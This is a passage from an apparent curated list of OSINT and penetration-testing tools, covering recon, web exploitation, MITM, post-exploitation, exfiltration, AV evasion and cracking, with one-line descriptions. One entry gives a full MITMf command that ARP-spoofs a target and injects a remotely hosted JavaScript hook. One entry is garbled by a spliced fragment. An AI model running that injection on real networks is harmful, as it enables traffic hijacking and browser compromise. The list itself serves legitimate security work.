[Wappalyzer](https://www.wappalyzer.com/) * [WebMeUp](https://webmeup.com/) * [Website Informer](https://website.informer.com/) * [WhatIsMyIPAddress](https://whatismyipaddress.com/) * [Who.is](https://who.is/) - Domain whois information. * [Whois Arin Online](https://whois.arin.net/ui/) * [WhoIsHostingThis](https://www.whoishostingthis.com/) * [Whoisology](https://whoisology.com) * [WhoIsRequest](https://whoisrequest.com/) * [w3snoop](https://webboar.com.w3snoop.com/) * [Verisign](https://dnssec-analyzer.verisignlabs.com/) * [ViewDNS.info](https://viewdns.info/) * [You Get Signal](https://www.yougetsignal.com/) #### Keywords Discovery and Research * [Google Adwords](https://ads.google.com/home/#!/) - Get monthly keyword volume data and stats. * [Google Trends](https://trends.google.com/trends/?geo=US) - See how many users are searching for specific keywords. * [Keyword Discovery](https://www.keyworddiscovery.com/) * [Keyword Spy](https://www.keywordspy.com/) * [KeywordTool](https://keywordtool.io/) * [One Look Reverse Dictionary](https://www.onelook.com/reverse-dictionary.shtml) * [Soovle](https://soovle.com/) * [Ubersuggest](https://neilpatel.com/ubersuggest/) * [Word Tracker](https://www.wordtracker.com/) #### Web History and Website Capture * [Archive.is](https://archive.is/) * [BlackWidow](https://softbytelabs.com/wp/blackwidow/) * [CashedPages](http://www.cachedpages.com) * [CachedView](https://cachedview.com/) * [DomainTools](https://account.domaintools.com/log-in/) * [Wayback Machine](https://archive.org/web/web.php) - Explore the history of a website. * [Wayback Machine Archiver](https://github.com/jsvine/waybackpack) #### Image Search * [Baidu Images](https://image.baidu.com/) * [Bing Images](https://www.bing.com/images/) * [Flickr](https://flickr.com/) * [Google Image](https://images.google.com) * [Gramfeed](http://www.gramfeed.com/) * [Image Identification Project](https://www.imageidentify.com/) * [Image Raider](https://infringement.report/api/raider-reverse-image-search/) * [KarmaDecay](http://karmadecay.com/) * [Lycos Image Search](https://search.lycos.com/) * [PhotoBucket](https://app.photobucket.com/explore) * [Picsearch](https://www.picsearch.com/) * [PicTriev](http://www.pictriev.com/) * [TinEye](https://tineye.com) - Reverse image search engine. * [Websta](https://websta.me/) * [Worldcam](http://www.worldc.am) * [Yahoo Image Search](https://images.search.yahoo.com) * [Yandex Images](https://www.yandex.com/images) #### Image Analysis * [ExifTool](https://exiftool.org/) * [Ghiro](https://www.getghiro.org/) * [ImpulseAdventure](https://www.impulseadventure.com/photo/jpeg-snoop.html) * [Jeffreys Image Metadata Viewer](http://exif.regex.info/exif.cgi) * [JPEGsnoop](https://github.com/ImpulseAdventure/JPEGsnoop) * [Metapicz](http://metapicz.com/#landing) #### Web Monitoring * [Alltop](https://alltop.com/) * [Awasu](https://awasu.com/) * [Bridge.Leslibres](https://bridge.leslibres.org/) * [Bridge.Suumitsu](https://bridge.suumitsu.eu/) * [ChangeDetect](https://www.changedetect.com/) * [Deltafeed](https://bitreading.com/deltafeed/) * [Feed43](https://feed43.com/) * [FeedBooster](https://www.qsensei.com/) * [Feed Exileed](http://feed.exileed.com/) * [Feed Filter Maker](https://feed.janicek.co/) * [Feedly](https://feedly.com/) * [FeedReader](https://www.feedreader.com/) * [FetchRSS](https://fetchrss.com/) * [Flipboard](https://flipboard.com/) * [FollowThatPage](https://www.followthatpage.com/) * [Google Alerts](https://www.google.com/alerts) - A content change detection and notification service. * [InfoMinder](https://app.infominder.com/webminder/) * [Mention](https://mention.com/en/) * [Netvibes](https://www.netvibes.com/en) * [Newsblur](https://newsblur.com/) * [OmeaReader](https://www.jetbrains.com/omea/reader/) * [OnWebChange](https://onwebchange.com/) * [Reeder](https://reederapp.com/) * [RSS Bridge](https://bridge.suumitsu.eu) * [RSS Feed Reader](https://chrome.google.com/webstore/detail/rss-feed-reader/pnjaodmkngahhkoihejjehlcdlnohgmp) * [RSS Micro](http://www.rssmicro.com/) * [RSS Search Engine](https://ctrlq.org/rss/) * [RSS Search Hub](https://www.rsssearchhub.com/) * [RSSOwl](https://www.rssowl.org/) * [Selfoss](https://selfoss.aditu.de/) * [Silobreaker](https://www.silobreaker.com/) * [Talkwalker](https://www.talkwalker.com/) * [The Old Reader](https://theoldreader.com/home) * [versionista](https://versionista.com/) * [visualping](https://visualping.io) * [WebSite Watcher](https://www.aignes.com/index.htm) * [Winds](https://winds.getstream.io/create-account) #### Social Network Analysis * [Gephi](https://gephi.org) * [ORA](http://www.casos.cs.cmu.edu/projects/ora/software.php) * [Sentinel Visualizer](https://fmsasg.com/) * [Visual Investigative Scenarios](https://vis.occrp.org) * [Wynyard Group](https://www.wynyardgroup.com/) #### DNS Search And Enumeration * [Amass](https://github.com/caffix/amass) - The amass tool searches Internet data sources, performs brute force subdomain enumeration, searches web archives, and uses machine learning to generate additional subdomain name guesses. DNS name resolution is performed across many public servers so the authoritative server will see the traffic coming from different locations. Written in Go. #### Network Reconnaissance Tools * [ACLight](https://github.com/cyberark/ACLight) - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins. * [BuiltWith](https://builtwith.com/) - Technology lookup tool for websites. * [CloudFail](https://github.com/m0rtem/CloudFail) - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS. * [LdapMiner](https://sourceforge.net/projects/ldapminer/) - Multiplatform LDAP enumeration utility. * [Mass Scan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. * [Netdiscover](https://github.com/alexxy/netdiscover) - Simple and quick network scanning tool. * [Pentest-Tools](https://pentest-tools.com/home) - Online suite of various different pentest related tools. * [Ruler](https://github.com/sensepost/ruler) - Tool for remotely interacting with Exchange servers. * [Shodan](https://www.shodan.io/) - Database containing information on all accessible domains on the internet obtained from passive scanning. * [Spyse](https://spyse.com/) - Web research services that scan the entire internet using OSINT, to simplify the investigation of infrastructure and attack surfaces. * [Spyse.py](https://github.com/zeropwn/spyse.py) - Python API wrapper and command-line client for the tools hosted on spyse.com. * [Sublist3r](https://github.com/aboul3la/Sublist3r) - Subdomain enumeration tool for penetration testers. * [ldapsearch](https://linux.die.net/man/1/ldapsearch) - Linux command line utility for querying LDAP servers. * [nmap](https://nmap.org/) - Free security scanner for network exploration & security audits. * [pyShodan](https://github.com/GoVanguard/pyShodan) - Python 3 script for interacting with Shodan API (requires valid API key). * [smbmap](https://github.com/ShawnDEvans/smbmap) - Handy SMB enumeration tool. * [xprobe2](https://linux.die.net/man/1/xprobe2) - Open source operating system fingerprinting tool. * [zmap](https://zmap.io/) - Open source network scanner that enables researchers to easily perform Internet-wide network studies. ### Exploitation Enumeration And Data Recovery Tools #### Penetration Testing OS Distributions * [ArchStrike](https://archstrike.org/) - Arch GNU/Linux repository for security professionals and enthusiasts. * [AttifyOS](https://github.com/adi0x90/attifyos) - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments. * [BackBox](https://www.backbox.org/) - Ubuntu-based distribution for penetration tests and security assessments. * [BlackArch](https://www.blackarch.org/) - Arch GNU/Linux-based distribution for penetration testers and security researchers. * [Buscador](https://inteltechniques.com/buscador/) - GNU/Linux virtual machine that is pre-configured for online investigators. * [Fedora Security Lab](https://labs.fedoraproject.org/en/security/) - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies. * [Kali](https://www.kali.org/) - GNU/Linux distribution designed for digital forensics and penetration testing. * [Network Security Toolkit (NST)](https://networksecuritytoolkit.org/nst/index.html) - Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications. * [Parrot Security OS](https://www.parrotsec.org/) - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration. * [The Pentesters Framework](https://github.com/trustedsec/ptf) - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains. #### Multi-paradigm Frameworks * [Armitage](http://www.fastandeasyhacking.com/) - Java-based GUI front-end for the Metasploit Framework. * [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query. * [Faraday](https://github.com/infobyte/faraday) - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments. * [Habu Hacking Toolkit](https://github.com/fportantier/habu) - Unified set of tools spanning passive reconnaissance, network attacks, social media monitoring, and website fingerprinting. * [Mad-Metasploit](https://www.hahwul.com/p/mad-metasploit.html) - Additional scripts for Metasploit. * [Metasploit](https://www.metasploit.com/) - Software for offensive security teams to help verify vulnerabilities and manage security assessments. * [Mobile Security Framework (MobSF)](https://github.com/MobSF/Mobile-Security-Framework-MobSF/) - Automated mobile application pentesting framework capable of static analysis, dynamic analysis, malware analysis, and web API testing. * [Pupy](https://github.com/n1nj4sec/pupy) - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool. * [Rupture](https://github.com/dionyziz/rupture) - Multipurpose tool capable of man-in-the-middle attacks, BREACH attacks and other compression-based crypto attacks. #### Network Vulnerability Scanners * [Nessus](https://www.tenable.com/products/nessus/nessus-professional) - Commercial network vulnerability scanner. * [Nexpose](https://www.rapid7.com/products/nexpose/) - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7. * [OpenVAS](https://www.openvas.org/) - Open source implementation of the popular Nessus vulnerability assessment system. * [Vuls](https://github.com/future-architect/vuls) - Agentless Linux/FreeBSD vulnerability scanner written in Go. #### Web Vulnerability Scanners * [ACSTIS](https://github.com/tijme/angularjs-csti-scanner) - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS. * [Burp Suite](https://portswigger.net/burp) - Commercial web vulnerability scanner, with limited community edition. * [cms-explorer](https://code.google.com/archive/p/cms-explorer/) - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running. * [Netsparker Web Application Security Scanner](https://www.netsparker.com/) - Commercial web application security scanner to automatically find many different types of security flaws. * [Nikto](https://cirt.net/nikto2) - Noisy but fast black box web server and web application vulnerability scanner. * [Observatory](https://observatory.mozilla.org/) - Free online web scanning utility. * [OWASP Zed Attack Proxy (ZAP)](https://owasp.org/www-project-zap/) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications. * [Security Headers](https://securityheaders.com/) - Free online utility for checking a website's HTTP headers for security vulnerabilities. * [SQLmate](https://github.com/s0md3v/sqlmate) - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional). * [WPScan](https://wpscan.com/wordpress-security-scanner) - Black box WordPress vulnerability scanner. #### Web Exploitation * [Browser Exploitation Framework (BeEF)](https://github.com/beefproject/beef) - Command and control server for delivering exploits to commandeered Web browsers. * [Commix](https://github.com/commixproject/commix) - Automated all-in-one operating system command injection and exploitation tool. * [Drupwn](https://github.com/immunIT/drupwn/) - Drupal web application exploitation tool. * [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible. * [fimap](https://github.com/kurobeats/fimap) - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs. * [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery. * [IIS-Shortname-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability. * [Kadabra](https://github.com/D35m0nd142/Kadabra) - Automatic LFI exploiter and scanner. * [Kadimus](https://github.com/P0cL4bs/Kadimus) - LFI scan and exploit tool. * [LFISuite](https://github.com/D35m0nd142/LFISuite) - A tool designed to exploit Local File Include vulnerabilities. * [libformatstr](https://github.com/hellman/libformatstr) - Python script designed to simplify format string exploits. * [liffy](https://github.com/hvqzao/liffy) - LFI exploitation tool. * [lyncsmash](https://github.com/nyxgeek/lyncsmash) - A collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations * [NoSQLmap](https://github.com/codingo/NoSQLMap) - Automatic NoSQL injection and database takeover tool. * [SQLmap](http://sqlmap.org/) - Automated SQL injection and database takeover tool. * [sqlninja](http://sqlninja.sourceforge.net/) - Automated SQL injection and database takeover tool. * [sslstrip2](https://github.com/LeonardoNve/sslstrip2) - SSLStrip version to defeat HSTS. * [sslstrip](https://github.com/moxie0/sslstrip) - Demonstration of the HTTPS stripping attacks. * [tplmap](https://github.com/epinna/tplmap) - Automatic server-side template injection and Web server takeover tool. * [VHostScan](https://github.com/codingo/VHostScan) - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages. * [wafw00f](https://github.com/EnableSecurity/wafw00f) - Identifies and fingerprints Web Application Firewall (WAF) products. * [webscreenshot](https://github.com/maaaaz/webscreenshot) - A simple script to take screenshots from a list of websites. * [weevely3](https://github.com/epinna/weevely3) - Weaponized web shell. * [Wordpress Exploit Framework](https://github.com/rastating/wordpress-exploit-framework) - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems. * [WPSploit](https://github.com/espreto/wpsploit) - Exploit WordPress-powered websites with Metasploit. #### Network Tools * [dnstwist](https://github.com/elceef/dnstwist) - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage. * [dsniff](https://www.monkey.org/~dugsong/dsniff/) - Collection of tools for network auditing and pentesting. * [enumdb](https://github.com/m8r0wn/enumdb) - MySQL and MSSQL bruteforce utility * [FireAway](https://github.com/tcstool/Fireaway/) - Firewall audit and security bypass tool. * [impacket](https://github.com/SecureAuthCorp/impacket) - Collection of Python classes for working with network protocols. * [Intercepter-NG](http://sniff.su/) - Multifunctional network toolkit. * [kerbrute](https://github.com/ropnop/kerbrute) - A tool to perform Kerberos pre-auth bruteforcing. * [Low Orbit Ion Cannon (LOIC)](https://github.com/NewEraCracker/LOIC/) - Open source network stress testing tool. * [Ncat](https://nmap.org/ncat/) - TCP/IP command line utility supporting multiple protocols. * [netcut](https://arcai.com/netcut/) - ARP based utility for discovering and spoofing MAC addresses and enabling/disabling network connectivity on network devices. * [Network-Tools.com](https://network-tools.com/) - Website offering an interface to numerous basic network utilities like `ping`, `traceroute`, `whois`, and more. * [patator](https://github.com/lanjelot/patator) - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. * [pig](https://github.com/rafael-santiago/pig) - GNU/Linux packet crafting tool. * [Praeda](http://h.foofus.net/?page_id=218) - Automated multi-function printer data harvester for gathering usable data during security assessments. * [Printer Exploitation Toolkit (PRET)](https://github.com/RUB-NDS/PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features. * [routersploit](https://github.com/threat9/routersploit) - Open source exploitation framework similar to Metasploit but dedicated to embedded devices. * [scapy](https://github.com/secdev/scapy) - Python-based interactive packet manipulation program & library. * [Sockstress](https://github.com/defuse/sockstress) - TCP based DoS utility. * [SPARTA](https://sparta.secforce.com/) - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools. * [Spyse](https://spyse.com/) - Web research services that scan the entire internet using OSINT, to simplify the investigation of infrastructure and attack surfaces. * [Spyse.py](https://github.com/zeropwn/spyse.py) - Python API wrapper and command-line client for the tools hosted on spyse.com. * [THC Hydra](https://github.com/vanhauser-thc/thc-hydra) - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more. * [UFONet](https://github.com/epsylon/ufonet/) - Layer 7 DDoS/DoS tool. * [Zarp](https://github.com/hatRiot/zarp/) - Multipurpose network attack tool, both wired and wireless. #### Protocol Analyzers and Sniffers * [tcpdump/libpcap](https://www.tcpdump.org/) - Common packet analyzer that runs under the command line. * [Wireshark](https://www.wireshark.org/) - Widely-used graphical, cross-platform network protocol analyzer. * [Yersinia](https://tools.kali.org/vulnerability-analysis/yersinia) - Packet and protocol analyzer with MITM capability. * [Fiddler](https://www.telerik.com/fiddler) - Cross platform packet capturing tool for capturing HTTP/HTTPS traffic. * [netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - Swiss army knife for Linux network sniffing. * [Dshell](https://github.com/USArmyResearchLab/Dshell) - Network forensic analysis framework. * [Chaosreader](http://chaosreader.sourceforge.net/) - Universal TCP/UDP snarfing tool that dumps session data from various protocols. #### Proxies and MITM Tools * [BetterCAP](https://www.bettercap.org/) - Modular, portable and easily extensible MITM framework. * [dnschef](https://github.com/iphelix/dnschef) - Highly configurable DNS proxy for pentesters. * [Ettercap](https://www.ettercap-project.org/) - Comprehensive, mature suite for machine-in-the-middle attacks. * [evilgrade](https://github.com/infobyte/evilgrade) - Modular framework to take advantage of poor upgrade implementations by injecting fake updates. * [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH * [MITMf](https://github.com/byt3bl33d3r/MITMf) - Multipurpose man-in-the-middle framework. - e.g. `mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js` * [mitmproxy](https://github.com/mitmproxy/mitmproxy) - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers. * [Morpheus](https://github.com/r00t-3xp10it/morpheus) - Automated ettercap TCP/IP Hijacking tool. * [Responder-Windows](https://github.com/lgandx/Responder-Windows) - Windows version of the above NBT-NS/LLMNR/MDNS poisoner. * [Responder](https://github.com/lgandx/Responder) - Open source NBT-NS, LLMNR, and MDNS poisoner. * [SSH MITM](https://github.com/jtesta/ssh-mitm) - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk. #### Wireless Network Tools * [Aircrack-ng](https://www.aircrack-ng.org/) - Set of tools for auditing wireless networks. * [BetterCAP](https://www.bettercap.org/) - Wifi, Bluetooth LE, and HID reconnaissance and MITM attack framework, written in Go. * [Fluxion](https://github.com/FluxionNetwork/fluxion) - Suite of automated social engineering based WPA attacks. * [Kismet](https://www.patreon.com/kismetwireless) - Wireless network discovery tool. * [MANA Toolkit](https://github.com/sensepost/mana) - Rogue AP and man-in-the-middle utility. * [NetStumbler](https://www.netstumbler.com/downloads/) - WLAN scanning tool. * [WiFi Pumpkin](https://github.com/P0cL4bs/wifipumpkin3) - All in one Wi-Fi exploitation and spoofing utility. * [wifi-pickle](https://github.com/GoVanguard/wifi-pickle) - Fake access point attacks. * [Wifite](https://github.com/derv82/wifite) - Automated wireless attack tool. #### Transport Layer Security Tools * [tlssled](https://tools.kali.org/information-gathering/tlssled) - Comprehensive TLS/SSL testing suite. * [SSLscan](https://github.com/rbsec/sslscan) - Quick command line SSL/TLS analyzer. * [SSLyze](https://github.com/nabla-c0d3/sslyze) - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations. * [SSL Labs](https://www.ssllabs.com/ssltest/) - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers. * [crackpkcs12](https://github.com/crackpkcs12/crackpkcs12) - Multithreaded program to crack PKCS#12 files (`.p12` and `.pfx` extensions), such as TLS/SSL certificates. * [spoodle](https://github.com/avicoder/spoodle) - Mass subdomain + POODLE vulnerability scanner. * [SMTP TLS Checker](https://luxsci.com/smtp-tls-checker) - Online TLS/SSL testing suite for SMTP servers. #### Cryptography * [FeatherDuster](https://github.com/nccgroup/featherduster) - Analysis tool for discovering flaws in cryptography. * [rsatool](https://github.com/ius/rsatool) - Tool for calculating RSA and RSA-CRT parameters. * [xortool](https://github.com/hellman/xortool/) - XOR cipher analysis tool. #### Post-Exploitation * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec/) - Multipurpose post-exploitation suite containing many plugins. * [DBC2](https://github.com/Arno0x/DBC2/) - Multipurpose post-exploitation tool. * [Empire](https://github.com/EmpireProject/Empire/) - PowerShell based (Windows) and Python based (Linux/OS X) post-exploitation framework. * [EvilOSX](https://github.com/Marten4n6/EvilOSX/) - macOS backdoor with docker support. * [Fathomless](https://github.com/xor-function/fathomless) - A collection of post-exploitation tools for both Linux and Windows systems. * [FruityC2](https://github.com/xtr4nge/FruityC2/) - Open source, agent-based post-exploitation framework with a web UI for management. * [Koadic](https://github.com/zerosum0x0/koadic) - Windows post-exploitation rootkit, primarily utilizing Windows Script Host. * [PlugBot](https://www.redteamsecure.com/research/plugbot-hardware-botnet-research) - Can be installed onto an ARM device for Command & Control use and more. * [Portia](https://github.com/milo2012/portia) - Automated post-exploitation tool for lateral movement and privilege escalation. * [ProcessHider](https://github.com/M00nRise/ProcessHider/) - Post-exploitation tool for hiding processes. * [Pupy](https://github.com/n1nj4sec/pupy/) - Open source cross-platform post-exploitation tool, mostly written in Python. * [RemoteRecon](https://github.com/xorrior/RemoteRecon/) - Post-exploitation utility making use of multiple agents to perform different tasks. * [TheFatRat](https://github.com/Exploit-install/TheFatRat) - Tool designed to generate remote access trojans (backdoors) with msfvenom.arch-project/) - Can be installed onto an ARM device for Command & Control use and more. * [p0wnedShell](https://github.com/Cn33liz/p0wnedShell) - PowerShell based post-exploitation utility utilizing .NET. * [poet](https://github.com/offlinemark/poet) - Simple but multipurpose post-exploitation tool. #### Exfiltration Tools * [Data Exfiltration Toolkit (DET)](https://github.com/PaulSec/DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time. * [dnsteal](https://github.com/m57/dnsteal/) - Fake DNS server for stealthily extracting files. * [HTTPTunnel](https://github.com/larsbrinkhoff/httptunnel) - Tunnel data over pure HTTP GET/POST requests. * [Iodine](https://github.com/yarrick/iodine) - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed. * [MailSniper](https://github.com/dafthack/MailSniper) - Search through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). * [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH. * [mimikatz](https://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows operating system. * [mimikittenz](https://github.com/orlyjamie/mimikittenz) - Post-exploitation PowerShell tool for extracting data from process memory. * [PANHunt](https://github.com/Dionach/PANhunt) - Search file systems for credit cards. * [PassHunt](https://github.com/Dionach/PassHunt) - Search file systems for passwords. * [ptunnel-ng](https://github.com/lnslbrty/ptunnel-ng) - Tunnel IPv4 traffic through ICMP pings; slow but stealthy when normal IP exfiltration traffic is blocked. * [pwnat](https://github.com/samyk/pwnat) - Punches holes in firewalls and NATs. * [spYDyishai](https://github.com/Night46/spYDyishai/) - Local Google credentials exfiltration tool, written in Python. * [tgcd](http://tgcd.sourceforge.net/) - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls. #### Static Analyzers * [Androbugs-Framework](https://github.com/AndroBugs/AndroBugs_Framework/) - Android program vulnerability analysis tool. * [Androwarn](https://github.com/maaaaz/androwarn/) - Android static code analysis tool. * [APKinspector](https://github.com/honeynet/apkinspector/) - Android APK analysis tool with GUI. * [bandit](https://pypi.org/project/bandit/) - Security oriented static analyser for python code. * [Brakeman](https://github.com/presidentbeef/brakeman) - Static analysis security vulnerability scanner for Ruby on Rails applications. * [Codebeat (open source)](https://codebeat.co/open-source/) - Open source implementation of commercial static code analysis tool with GitHub integration. * [Codelyzer](https://github.com/mgechev/codelyzer) - A set of tslint rules for static code analysis of Angular TypeScript projects. You can run the static code analyzer over web apps, NativeScript, Ionic, etc. * [cppcheck](http://cppcheck.sourceforge.net/) - Extensible C/C++ static analyzer focused on finding bugs. * [FindBugs](http://findbugs.sourceforge.net/) - Free software static analyzer to look for bugs in Java code. * [Icewater](https://github.com/SupportIntelligence/Icewater) - 16,432 free Yara rules. * [Joint Advanced Defense Assessment for Android Applications (JAADAS)](https://github.com/flankerhqd/JAADAS/) - Multipurpose Android static analysis tool. * [OWASP Dependency Check](https://owasp.org/www-project-dependency-check/) - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the depedencies. * [pefile](https://github.com/erocarrera/pefile) - Static portable executable file inspector. * [Progpilot](https://github.com/designsecurity/progpilot) - Static security analysis tool for PHP code. * [Quick Android Review Kit (Qark)](https://github.com/linkedin/qark/) - Tool for finding security related Android application vulnerabilities. * [ShellCheck](https://github.com/koalaman/shellcheck) - Static code analysis tool for shell script. * [smalisca](https://github.com/dorneanu/smalisca) - Android static code analysis tool. * [sobelow](https://github.com/nccgroup/sobelow) - Security-focused static analysis for the Phoenix Framework. * [truffleHog](https://github.com/dxa4481/truffleHog) - Git repo scanner. * [Veracode](https://www.veracode.com/) - Commercial cloud platform for static code analysis, dynamic code analysis, dependency/plugin analysis, and more. * [VisualCodeGrepper](https://github.com/nccgroup/VCG) - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices. * [Yara](https://github.com/VirusTotal/yara) - Static pattern analysis tool for malware researchers. #### Dynamic Analyzers * [AndroidHooker](https://github.com/AndroidHooker/hooker/) - Dynamic Android application analysis tool. * [Androl4b](https://github.com/sh4hin/Androl4b/) - Android security virtual machine based on Ubuntu-MATE for reverse engineering and malware analysis. * [Cheat Engine](https://www.cheatengine.org/) - Memory debugger and hex editor for running applications. * [ConDroid](https://github.com/JulianSchuette/ConDroid) - Android dynamic application analysis tool. * [Cuckoo](https://github.com/cuckoosandbox) - Automated dynamic malware analysis tool. * [DECAF](https://github.com/decaf-project/DECAF) - Dynamic code analysis tool. * [droidbox](https://github.com/pjlantz/droidbox) - Dynamic malware analysis tool for Android, extension to DECAF. * [drozer](https://github.com/FSecureLABS/drozer) - Android platform dynamic vulnerability assessment tool. * [idb](https://www.idbtool.com/) - iOS app security analyzer. * [Inspeckage](https://github.com/ac-pm/Inspeckage) - Dynamic Android package analysis tool. #### Hex Editors * [Cheat Engine](https://www.cheatengine.org/) - Memory debugger and hex editor for running applications. * [Frhed](http://frhed.sourceforge.net/en/) - Binary file editor for Windows. * [HexEdit.js](https://hexed.it/) - Browser-based hex editing. * [Hexinator](https://hexinator.com/) - World's finest (proprietary, commercial) Hex Editor. #### File Format Analysis Tools * [Hachoir](https://hachoir.readthedocs.io/en/latest/index.html) - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction. * [Kaitai Struct](https://kaitai.io/) - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby. * [Veles](https://codisec.com/veles/) - Binary data visualization and analysis tool. #### Anti-Virus Evasion Tools * [AntiVirus Evasion Tool (AVET)](https://github.com/govolution/avet) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software. * [Hyperion](https://nullsecurity.net/tools/binary.html) - Runtime encryptor for 32-bit portable executables ("PE `.exe`s"). * [peCloak.py](https://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/) - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection. * [peCloakCapstone](https://github.com/v-p-b/peCloakCapstone) - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool. * [Shellter](https://www.shellterproject.com/) - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. * [SigThief](https://github.com/secretsquirrel/SigThief) - Stealing signatures to evade AV. * [UniByAv](https://github.com/Mr-Un1k0d3r/UniByAv) - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key. * [Windows-SignedBinary](https://github.com/vysecurity/Windows-SignedBinary) - AV evasion tool for binary files. #### Hash Cracking Tools * [CeWL](https://digi.ninja/projects/cewl.php) - Generates custom wordlists by spidering a target's website and collecting unique words. * [CrackStation](https://crackstation.net/) - Online password cracker. * [Hashcat](http://hashcat.net/hashcat/) - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration. * [John the Ripper Jumbo edition](https://github.com/openwall/john) - Community enhanced version of John the Ripper. * [John the Ripper](https://www.openwall.com/john/) - Fast password cracker. * [JWT Cracker](https://github.com/lmammino/jwt-cracker) - Simple HS256 JWT token brute force cracker. * [Mentalist](https://github.com/sc0tfree/mentalist) - Unique GUI based password wordlist generator compatible with CeWL and John the Ripper. * [JPassword Recovery Tool](https://sourceforge.net/projects/jpassrecovery/) - RAR bruteforce cracker. Formery named RAR Crack. #### Windows Utilities * [Bloodhound](https://github.com/BloodHoundAD/BloodHound/wiki) - Graphical Active Directory trust relationship explorer. * [Commentator](https://github.com/clr2of8/Commentator) - PowerShell script for adding comments to MS Office documents, and these comments can contain code to be executed. * [DeathStar](https://github.com/byt3bl33d3r/DeathStar) - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments. * [Empire](https://www.powershellempire.com/) - Pure PowerShell post-exploitation agent. * [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel. * [GetVulnerableGPO](https://github.com/gpoguy/GetVulnerableGPO/) - PowerShell based utility for finding vulnerable GPOs. * [Headstart](https://github.com/GoVanguard/script-win-privescalate-headstart) - Lazy man's Windows privilege escalation tool utilizing PowerSploit. * [Hyena](https://www.systemtools.com/hyena/download.htm) - NetBIOS exploitation. * [Luckystrike](https://github.com/curi0usJack/luckystrike) - PowerShell based utility for the creation of malicious Office macro documents. * [Magic Unicorn](https://github.com/trustedsec/unicorn) - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or `certutil` (using fake certificates). * [Mimikatz](https://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows operating system. * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - PowerShell Post-Exploitation Framework. * [PSKernel-Primitives](https://github.com/FuzzySecurity/PSKernel-Primitives/) - Exploiting primitives for PowerShell. * [Redsnarf](https://github.com/nccgroup/redsnarf) - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers. * [Rubeus](https://github.com/GhostPack/Rubeus) - Rubeus is a C# toolset for raw Kerberos interaction and abuses. * [Sysinternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) - The Sysinternals Troubleshooting Utilities. * [Windows Credentials 